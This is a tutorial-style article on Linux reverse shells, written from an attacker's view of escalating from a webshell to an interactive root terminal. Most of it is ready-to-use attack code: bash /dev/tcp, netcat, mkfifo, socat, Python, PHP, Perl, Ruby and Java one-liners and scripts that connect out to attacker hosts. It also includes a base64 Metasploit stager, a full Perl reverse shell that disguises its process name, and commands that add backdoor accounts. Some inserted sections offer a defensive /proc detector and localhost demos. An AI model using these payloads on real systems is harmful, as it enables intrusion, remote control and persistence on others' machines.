Reverse shell: principle and implementation
2022-08-03 01:02:00 【wespten】
A webshell is a common way of taking over a web server. When a Linux web server is compromised through a webshell, the next step is usually privilege escalation. If the escalation exploit is run directly from the webshell there is no interactive environment: commands cannot be chained, and even a successful escalation cannot be used.
So the attacker first bounces a shell back to a machine they control (a reverse shell), which gives an interactive terminal comparable to a legitimate login. The escalation exploit is then run from that shell, upgrading from an ordinary user to root, and the later stages of the attack continue from the same shell. Understanding how reverse shells work on Linux is therefore necessary for both attacking and defending.
一、Introduction to reverse shells
A reverse shell is one where the controlling end listens on a TCP or UDP port, the controlled end initiates a connection to that port, and the command line's input and output are wired to that connection. Compared with a standard shell reached over telnet or ssh, the client and server roles of the network connection are swapped: the victim is the client and the attacker is the server.
With a forward (bind) connection the attacker connects to a port opened on the target (target IP : target port); remote desktop, web services, ssh and telnet all work this way. When the target sits behind a firewall, the attacker's process lacks the privileges to open a port, or the port is already in use, a forward connection is not possible. That is when the reverse connection comes in: the attacker runs the server and the victim host actively connects to it.
Why a reverse shell?
It is used when the controlled end is limited by a firewall, lacks privileges, or has its ports already taken.
Example: suppose we have compromised a machine and opened a port on it; the attacker then connects from their own machine to (target IP : target port). This is the usual form, called a forward connection; remote desktop, web services, ssh and telnet are all forward connections.
When is a forward connection not usable?
1. A client machine ran your web trojan, but it is on a private LAN, so you cannot connect to it directly.
2. The target's IP address changes dynamically, so you cannot keep control of it.
3. Because of a firewall or similar restriction, the remote machine can only send requests, not receive them.
4. With viruses and trojans you do not know when a victim will be infected, what their network looks like, or when the machine is switched on or off; so setting up a server and having the malicious program connect out to it is the better strategy.
The "reverse" part is then easy to understand: the attacker sets up the server and the victim host actively connects to the attacker's server program. That is a reverse connection.
二、How the reverse shell works
In penetration tests we frequently deal with Linux hosts, and getting a shell on a Linux host is one of the tasks we do most often. The following scenarios come up again and again.
Scenario 1
We have obtained a webshell on the host and want a virtual terminal that can drive the host directly. The first thing that comes to mind is a listening shell. This scenario is simple: we can open it with nc, and if nc is missing we can easily download and install one. The specific commands to open the listener follow.
(1) Installing netcat
Note that almost all Linux distributions ship a netcat package, but for security reasons the packaged build is usually missing the -e option, the one that lets netcat hand a local shell to whoever connects or bounce it to a remote host. So we download and build the original GNU netcat ourselves, as follows.
Original netcat: https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
# Step 1: download the netcat source tarball (all steps run as root)
wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
# Step 2: unpack it
tar -xvzf netcat-0.7.1.tar.gz
# Step 3: build and install
cd netcat-0.7.1
./configure
make
make install
make clean
# The full build procedure is described in the INSTALL file in the source tree.
# Step 4: check the help of the freshly built nc
nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: nc [options] hostname port [port] ...
listen for inbound: nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere: nc -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close close connection on EOF from stdin
-e, --exec=PROGRAM program to exec after connect
-g, --gateway=LIST source-routing hop point[s], up to 8
-G, --pointer=NUM source-routing pointer: 4, 8, 12, ...
-h, --help display this help and exit
-i, --interval=SECS delay interval for lines sent, ports scanned
-l, --listen listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT forward local port to remote address
-n, --dont-resolve numeric-only IP addresses, no DNS
-o, --output=FILE output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM local port number
-r, --randomize randomize local and remote ports
-s, --source=ADDRESS local source address (ip or hostname)
-t, --tcp TCP mode (default)
-T, --telnet answer using TELNET negotiation
-u, --udp UDP mode
-v, --verbose verbose (use twice to be more verbose)
-V, --version output version information and exit
-x, --hexdump hexdump incoming and outgoing traffic
-w, --wait=SECS timeout for connects and final net reads
-z, --zero zero-I/O mode (used for scanning)
Remote port number can also be specified as range. Example: '1-1024'
Now we have a native netcat with the -e option, so we can publish the local bash over the network.
(2) Start a listener on the target (through the webshell)
# Listen on local TCP 8080 and attach the local bash to whoever connects.
nc -lvvp 8080 -t -e /bin/bash
# In my test the -n (no DNS) form, nc -lvnp 8080, works fine too.
(3) Connect to the target host directly
nc 192.168.31.174 8080
whoami
root
w
22:57:36 up 1:24, 0 users, load average: 0.52, 0.58, 0.59
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Explanation: through the webshell we start nc on the target listening on TCP 8080 with its bash attached; connecting to 192.168.31.174:8080 from our own machine then gives us that bash over the session. Note which side -e goes on: on the listening side it publishes the listener's own shell (a bind shell, as here); on the connecting side it hands the connecting host's shell to the listener (a reverse shell, as in scenario 2). Putting -e on both ends just ties two shells to each other and gives nobody a prompt.
When the -e option is not available (these variants connect out to the attacker instead; replace attackerip):
mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 4444   # one-way only: sends the shell's output, does not feed it input
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
When the installed nc is otherwise problematic (this form needs nothing but a plain nc):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
(4) Shell obtained
After connecting, the nc listener on the target hands us its bash over the TCP 8080 session and we have a working shell environment.
Scenario 2
The target is an internal host with no public IP address, so we cannot connect to it from the Internet. Here we use the webshell to bounce a shell out to our Internet-facing host and get a terminal on the target that way. There are many ways to bounce a shell; a few common ones follow.
Bash reverse shell
Bash one-liner reverse shell: personally I think the best method is the bash one-liner built on redirections. The commands are as follows.
(1) Listen on a port on the attacking machine:
# nc -lvp 8080
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
(2) Bash one-liner on the victim:
bash -i >& /dev/tcp/192.168.31.41/8080 0>&1
Breakdown of the bash one-liner
The commonly used bash one-liner is taken apart below.
1. nc -lvp 8080
-l listen, -v verbose (print connection and error information), -p port. nc is short for netcat; it can listen on any TCP/UDP port, acting as a server over TCP or UDP.
2. bash -i
-i interactive: start an interactive bash.
3. /dev/tcp/IP/PORT
A special path (on Linux everything is a file). The file does not actually exist; it is an interface bash itself implements for network requests. Opening it is equivalent to a socket call that establishes a connection, and reading from or writing to it is equivalent to sending and receiving on that socket. It is a bash feature, not a kernel one, so the one-liner does not work under sh or dash.
4. >& and 0>&1
>& /dev/tcp/... sends both standard output and standard error of bash to the socket. 0>&1 then makes standard input the same file descriptor as standard output, i.e. the socket as well.
The complete reading of the one-liner: bash creates an interactive shell, connects to port 8080 on the attacking host (the TCP 8080 session), redirects the shell's stdout and stderr into that session, and finally makes the shell read its commands from the same session. The result is a bash reverse shell.
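The redirections above leave a visible trace: the shell process ends up with file descriptors 0, 1 and 2 all pointing at a socket, which on Linux shows up as /proc/<pid>/fd/0 -> socket:[inode]. The same is true of the netcat -e, python dup2 and perl variants later on this page. The following script is an added example (not part of the original article) that turns this into a defender's check. It reads /proc when run on Linux and also accepts a constructed snapshot so the logic can be exercised anywhere; the process names, pids and inode numbers in the sample snapshot are made up.

```python
#!/usr/bin/env python3
"""Flag processes whose standard streams are sockets: the footprint of a reverse shell."""
import os
import re

# Interpreters and tools that a reverse shell one-liner leaves holding the socket.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "ash", "ksh", "python", "python2", "python3",
              "perl", "php", "ruby", "lua", "nc", "netcat", "ncat", "socat", "telnet",
              "awk", "gawk"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")


def socket_fds(fd_targets):
    """Return {fd: inode} for those of fd 0, 1, 2 that point at a socket.

    fd_targets maps fd number -> readlink() result, e.g. {0: "socket:[48213]", 1: "/dev/pts/0"}.
    """
    found = {}
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fd_targets.get(fd, ""))
        if m:
            found[fd] = int(m.group(1))
    return found


def classify(comm, fd_targets):
    """'reverse_shell' when a shell-like process has both stdin and stdout on a socket,
    'review' when any other process does (inetd- or systemd-socket-activated services
    look like this too), otherwise None."""
    socks = socket_fds(fd_targets)
    if 0 not in socks or 1 not in socks:
        return None
    return "reverse_shell" if os.path.basename(comm) in SHELL_LIKE else "review"


def find_reverse_shells(snapshot):
    """snapshot: {pid: (comm, {fd: target})}. Returns sorted [(pid, comm, verdict, inode)]."""
    hits = []
    for pid, (comm, fds) in snapshot.items():
        verdict = classify(comm, fds)
        if verdict:
            hits.append((pid, comm, verdict, socket_fds(fds)[0]))
    return sorted(hits)


def snapshot_from_proc(proc="/proc"):
    """Build the same structure from a live Linux /proc (root is needed to see other users' fds)."""
    snap = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/comm") as fh:
                comm = fh.read().strip()
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(f"{proc}/{entry}/fd/{fd}")
                except OSError:        # fd closed, or not permitted
                    pass
            snap[int(entry)] = (comm, fds)
        except OSError:                # process exited meanwhile, or not readable
            continue
    return snap


# Constructed sample snapshot (not real data): a bash on a pty, a bash reverse shell,
# a daemon with nothing on its standard streams, and a socket-activated service.
SAMPLE = {
    1422: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    2310: ("bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    811: ("nginx", {0: "/dev/null", 1: "/dev/null", 2: "/var/log/nginx/error.log"}),
    977: ("in.fingerd", {0: "socket:[9021]", 1: "socket:[9021]", 2: "/dev/null"}),
}

if __name__ == "__main__":
    snap = snapshot_from_proc() if os.path.isdir("/proc/self/fd") else SAMPLE
    for pid, comm, verdict, inode in find_reverse_shells(snap):
        print(f"{verdict:13} pid={pid:<6} comm={comm:<12} socket inode={inode}")
```

The reported socket inode is the same number that appears in the inode column of /proc/net/tcp and in the output of ss -tnpe, so it can be joined to the remote address the shell is talking to. Anything classified as reverse_shell whose peer is not a known management host deserves an immediate look; the review class is mostly legitimate socket-activated services.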
(3) The attacker receives the victim's bash
# nc -lvp 8080
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.31.41
# the attacker now has the victim's remote interactive shell; what we type is echoed back because there is no tty
hostname
hostname
victim
Scenario 3
A problem that grows out of using the shells obtained above: even when we get control of the target's virtual terminal with the methods above, the interaction is often very poor, the output is incomplete, and the session is unstable. Specifically:
Problem 1: the terminal is not interactive; we want to add an account with a password and cannot complete it.
Problem 2: standard error is not displayed, and editors such as vim cannot be used normally.
Problem 3: the terminal on the target is very unstable and disconnects easily.
Adding a Linux account in one line
If there is no interactive interface, the approach is to add the account and its password with a single line of script. I have collected the following ways.
chpasswd method
(1) Command
useradd newuser;echo "newuser:password"|chpasswd
(2) Example
# useradd guest;echo 'guest:123456'|chpasswd
# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:$6$H0a/Nx.w$c2549uqXOULY4KvfCK6pTJQahhW7fuYYyHlo8HpnBxnUMtbXEbhgvFywwyPo5UsCbSUAMVvW9a7PsJB12TXPn.:17425:0:99999:7:::
useradd -p method
(1) Command
useradd -p encrypted_password newuser
The argument to -p must already be a crypt(3) hash, not a plaintext password. Note that openssl passwd without an algorithm flag prints a 13-character traditional DES hash (the guest line below); use openssl passwd -6 to get a SHA-512 hash like the other entries.
(2) Example
# useradd -p `openssl passwd 123456` guest
# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:h8S5msqJLVTfo:17425:0:99999:7:::
(3) Other forms of the same method
Variant one:
# useradd -p "$(openssl passwd 123456)" guest
Variant two:
user_password="`openssl passwd 123456`"
useradd -p "$user_password" guest
echo -e method
(1) Command
useradd newuser;echo -e "123456\n123456\n" |passwd newuser
(2) Example
# useradd test;echo -e "123456\n123456\n" |passwd test
Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully
# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:h/UnnFIjqKogw:17425:0:99999:7:::
test:$6$rEjvwAb2$nJuZ1MDt0iKbW9nigp8g54ageiKBDuoLObLd1kWUC2FmLS0xCFFZmU4dzRtX/i2Ypm9uY6oKrSa9gzQ6qykzW1:17425:0:99999:7:::
Getting a proper virtual terminal with python
The shell we get is often unstable or non-interactive because it is not a real terminal: there is no pty behind it. We can use python to obtain one. Python ships with most Linux distributions, so this is convenient; and if it is missing, installing it by hand is easy.
Python one-liner for a proper shell
The command:
# python -c "import pty;pty.spawn('/bin/bash')"
Explanation: python's standard library includes the pty module.
1. -c
execute the following string as code
2. import pty
import the standard library module pty
3. pty.spawn
spawn /bin/bash under a pseudo-terminal, which gives a proper shell
Demonstration
(1) start the listener; (2) bounce the shell; (3) the session is established as before and is not repeated here. The original article showed screenshots of the problems with the raw reverse shell and of the fix through python.
The terminal obtained this way is still not quite as good as a real one (the usual follow-up is to press Ctrl-Z, run stty raw -echo; fg on the attacking side and then export TERM=xterm in the shell, so that tab completion works and Ctrl-C reaches the remote shell instead of killing the listener), but with a bit of polishing it comes close.
Sometimes during a test you will find that the system's command terminal cannot be accessed directly; at that moment a python-virtualised terminal will be a bright spot.
三、Ways to implement a reverse shell
The one-liners below are all used the same way: open a TCP 8080 listener on the attacking machine, run the one-liner on the remote target, and the target's bash comes back to port 8080 on the attacking host (the prerequisite, of course, is that the target has the interpreter the one-liner needs).
The usual ones are netcat, socat, plain bash, python, Java, perl and a few more.
1、Bash reverse shell
Step 1: on the attacking machine [192.168.67.188], open a local listener: nc -lvvp 8888
Step 2: on the target machine [192.168.67.190]:
bash -i >& /dev/tcp/192.168.67.188/8888 0>&1
or
bash -c 'sh -i &>/dev/tcp/192.168.67.188/8888 0>&1'
bash -i opens an interactive bash. The local bash's standard output, standard error and standard input are redirected over the socket to the remote host.
After running the command on the target, we return to the attacking machine and see that the shell has arrived. The exec builtin replaces the current shell process with the given command instead of starting it in a child; used with no command, exec applies its redirections to the current shell permanently. That is what the next variant relies on: it opens the socket as file descriptor 5 of the current shell, then reads lines from it and runs each one.
exec 5<>/dev/tcp/evil.com/8080
cat <&5 | while read line; do $line 2>&5 >&5; done
Other variants:
exec 3<>/dev/tcp/www.google.com/80
echo -e "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n" >&3
cat <&3
(this one is not a shell; it only shows /dev/tcp being used for a plain HTTP request)
exec /bin/bash 0</dev/tcp/attackerip/8080 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
In testing, exec 2>&0 on its own (without /bin/bash) followed by the line 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 also brought a shell back to the local listener.
2、socat one-liner
Socat is a multi-purpose networking tool for Linux; the name comes from "Socket CAT", so as the name says it is built on sockets and can do a great many socket-related things. Its functionality resembles netcat's, and it is fair to call it an enhanced netcat: the original netcat has not been maintained for a long time and shows its age. Here I only cover how to use it to listen and to bounce a shell; see the references at the end of the original article for the rest.
A static socat binary can be downloaded from: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
Step 1: start the listener on the attacking machine
# socat TCP-LISTEN:12345 -
Step 2: run socat on the target to bounce the shell
# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.174:12345
Step 3: the shell comes back. Because of the pty,stderr,setsid,sigint,sane options the remote bash already runs on a pseudo-terminal, so it does not need the python pty trick from scenario 3. To make full use of that (tab completion, Ctrl-C going to the remote shell instead of killing the local socat), put the local terminal in raw mode on the listening side: socat file:`tty`,raw,echo=0 TCP-LISTEN:12345
3、python脚本反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The prompt shows as sh-4.1#.
Another form (no interactive shell: each received line is run through Popen and its stdout and stderr are sent back):
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Python script:
#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.20.151",7777)) # change to your own external IP; any port
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
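Both ends of the exchange described by the bash one-liner breakdown above and by this script, in one runnable program. This is an added example, not code from the article: the listener plays the attacker's nc -lvp side, and the victim side spawns /bin/sh -i with its stdin, stdout and stderr attached to the socket. The one deviation from the script above is that the socket is attached through subprocess's stdin/stdout/stderr parameters, i.e. the dup2 happens in the child only, so the demo process keeps its own terminal. It runs entirely on 127.0.0.1 with an ephemeral port; the host, port, shell path and the commands sent are the only assumptions.

```python
#!/usr/bin/env python3
"""Attacker listener and victim connector of a TCP reverse shell in one process."""
import socket
import subprocess
import threading


def victim(host, port, shell="/bin/sh"):
    """The article's python one-liner: connect out, attach fds 0/1/2 to the socket, run sh -i.
    Passing the socket's fd as stdin/stdout/stderr does the dup2 in the child only."""
    s = socket.create_connection((host, port))
    try:
        fd = s.fileno()
        subprocess.call([shell, "-i"], stdin=fd, stdout=fd, stderr=fd)
    finally:
        s.close()  # once the shell exits, the listener sees EOF


def listener_session(commands, timeout=30):
    """Play the `nc -lvp PORT` side: accept one connection, send `commands` followed by
    `exit`, and return everything the remote shell wrote back. Prompts, stderr and stdout
    all arrive on the same socket, which is exactly why the one-liner dup2s all three fds."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # ephemeral port, like choosing 8080 in the article
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    # Stands in for the one-liner being run on the target.
    t = threading.Thread(target=victim, args=("127.0.0.1", port), daemon=True)
    t.start()

    conn, _peer = srv.accept()
    srv.close()
    out = bytearray()
    with conn:
        conn.settimeout(timeout)
        conn.sendall(("\n".join(commands) + "\nexit\n").encode())
        while True:
            chunk = conn.recv(4096)
            if not chunk:            # shell exited and the victim closed the socket
                break
            out += chunk
    t.join(timeout)
    return out.decode(errors="replace")


if __name__ == "__main__":
    # Constructed commands; the shell's prompt and any "no job control" warning come back too.
    print(listener_session(["id", "echo RS_$((40+2))"]))
```

What comes back is raw: the prompt characters and any warning bash prints about the missing terminal are interleaved with the command output, which is the "poor interaction" scenario 3 complains about and what the python pty trick fixes.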
The Metasploit version:
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
base64 decoded (Python 2 code: exec with a string and the 'base64' codec of str.decode):
import socket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})
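The decoded stager is a small protocol: a 4-byte big-endian length, then exactly that many bytes of Python, exec'd with the socket bound to s so the stage can keep talking on the same connection. The script below is an added example, not Metasploit's code: it implements both ends of that framing on 127.0.0.1 and fixes two weaknesses of the while len(d)!=l: d+=s.recv(4096) loop, which spins forever if the peer disconnects (recv returns b'' and the length never matches) and accepts an arbitrarily large length. The stage body is a harmless constructed snippet; the size limit, port selection and function names are my own.

```python
#!/usr/bin/env python3
"""Length-prefixed stage delivery: the handler sends, the stager receives and execs."""
import socket
import struct
import threading

HDR = struct.Struct(">I")     # 4-byte big-endian length, as in the decoded stager


def recv_exact(sock, n):
    """Read exactly n bytes. Raise ConnectionError on EOF instead of spinning."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(4096, n - len(buf)))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def send_stage(sock, stage, truncate_at=None):
    """Handler side. truncate_at=k sends only the first k body bytes (simulates a dropped link)."""
    body = stage if truncate_at is None else stage[:truncate_at]
    sock.sendall(HDR.pack(len(stage)) + body)


def fetch_stage(sock, max_len=1 << 20):
    """Stager side: read the header, refuse absurd lengths before allocating, then the body."""
    (n,) = HDR.unpack(recv_exact(sock, HDR.size))
    if n > max_len:
        raise ValueError(f"stage length {n} exceeds {max_len}")
    return recv_exact(sock, n)


def run_stage(code, sock=None):
    """What the stager does with the bytes: exec them with the socket bound to `s`.
    Returns the namespace so the caller can see what the stage defined."""
    ns = {"s": sock}
    exec(code.decode() if isinstance(code, bytes) else code, ns)
    return ns


def serve_stage_once(stage, truncate_at=None):
    """Listen on an ephemeral port, serve one stager in a background thread, return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def handler():
        conn, _ = srv.accept()
        with conn:
            send_stage(conn, stage, truncate_at)
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return srv.getsockname()[1]


def stage_and_run(port, host="127.0.0.1"):
    """Stager side end to end: connect, fetch, exec. Returns the namespace the stage left."""
    with socket.create_connection((host, port)) as s:
        code = fetch_stage(s)
        return run_stage(code, s)


# Constructed stage (not a real Metasploit stage): computes a value and records which
# port it was served from, using the `s` the stager leaves in scope.
SAMPLE_STAGE = b"result = 40 + 2\npeer_port = s.getpeername()[1]\n"

if __name__ == "__main__":
    port = serve_stage_once(SAMPLE_STAGE)
    ns = stage_and_run(port)
    print("stage ran: result =", ns["result"], "served from port", ns["peer_port"])
```

The same framing is what a network sensor can key on: a fresh outbound connection whose first four server bytes are a length followed by plaintext Python is the staged python payload, even when the one-liner that started it has been obfuscated.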
4、PHP reverse shell
php -r '$sock=fsockopen("192.168.31.41",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
Another form:
Start the listener on Kali, run the script, and the shell comes back. A note from the author's testing: it came back when the PHP was saved as a .txt file and fed to the php binary, but not when it was saved as a .php file. The likely reason is that <&3 >&3 2>&3 assumes the socket is file descriptor 3; that holds for the php command-line interpreter with no other files open, but not inside a web server process, where the socket gets a different descriptor number.
PHP script:
<?php
$sock=fsockopen("192.168.20.151",7777); // change to your own external IP; any port
exec("/bin/sh -i <&3 >&3 2>&3");
?>
5、Java reverse shell (this first snippet is Groovy syntax, as used in the Jenkins script console; it just runs the bash exec 5<>/dev/tcp one-liner)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
In msf: use payload/java/shell/reverse_tcp
A longer plain-Java version (an old applet-based reverse shell; java.applet has been deprecated for removal since Java 17, but the body of init() works as-is from a main method):
import java.io.*;
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;

public class poc extends Applet {
    /**
     * Author: daniel baier alias duddits
     * Licens: GPL
     * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
     * Version: 0.1 alpha release
     */
    public String cd(String start, File currentDir) {
        File fullPath = new File(currentDir.getAbsolutePath());
        String sparent = fullPath.getAbsoluteFile().toString();
        return sparent + "/" + start;
    }

    public void init() {
        poc rs = new poc();
        PrintWriter out;
        try {
            Socket clientSocket = new Socket("192.168.5.222", 10003);
            out = new PrintWriter(clientSocket.getOutputStream(), true);
            out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
            boolean run = true;
            String s;
            BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
            String startort = "/";   // working directory for the commands
            while (run) {
                File f = new File(startort);
                out.println(f.getAbsolutePath() + "> ");
                s = br.readLine();
                if (s == null || s.equals("exit")) {
                    // null means the controller closed the connection; comparing
                    // s.equals(null) would throw a NullPointerException here instead
                    run = false;
                } else if (s.equals("cmd") || s.equals("")) {
                    // nothing to run, just print the prompt again
                } else {
                    String z1 = s;
                    Pattern pcd = Pattern.compile("^cd\\s");
                    Matcher mcd = pcd.matcher(z1);
                    String[] teile1 = pcd.split(z1);
                    if (mcd.find()) {
                        try {
                            String cds = rs.cd(teile1[1], new File(startort));
                            startort = cds;
                        } catch (Exception verz) {
                            out.println("Path " + teile1[1] + " not found.");
                        }
                    } else {
                        String z2 = s;
                        Pattern pstring = Pattern.compile("\\s");
                        String[] plist = pstring.split(z2);
                        try {
                            LinkedList<String> slist = new LinkedList<String>();
                            for (int i = 0; i < plist.length; i++) {
                                slist.add(plist[i]);
                            }
                            ProcessBuilder builder = new ProcessBuilder(slist);
                            builder.directory(new File(startort));
                            Process p = builder.start();
                            Scanner se = new Scanner(p.getInputStream());
                            if (!se.hasNext()) {
                                Scanner sa = new Scanner(p.getErrorStream());
                                while (sa.hasNext()) {
                                    out.println(sa.nextLine());
                                }
                            }
                            while (se.hasNext()) {
                                out.println(se.nextLine());
                            }
                        } catch (Exception err) {
                            out.println(f.getAbsolutePath() + "> Command " + s + " failed!");
                            out.println(f.getAbsolutePath() + "> Please try cmd /c " + s + " or bash -c " + s + " if this command is an shell buildin.");
                        }
                    }
                }
                if (!clientSocket.isConnected()) {
                    run = false;
                    out.flush();
                    out.close();
                }
            }
        } catch (Exception io) {
            //System.err.println("Connection refused by peer");
        }
    }
}
6、Perl reverse shell
perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
With this command the only difference is that the prompt becomes sh-4.1#; the principle is the same as the bash version above. Perl is powerful.
A shell that does not depend on /bin/sh; this line is shorter than the one above and indeed needs no /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
If the target runs Windows (where there is no fork):
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
A complete Perl reverse shell script (the well-known perl-reverse-shell, written to run as a CGI script):
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
              # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }
    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}
7、Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i<&%d >&%d 2>&%d",f,f,f)'
Without depending on /bin/sh:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
If the target runs Windows (no fork):
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
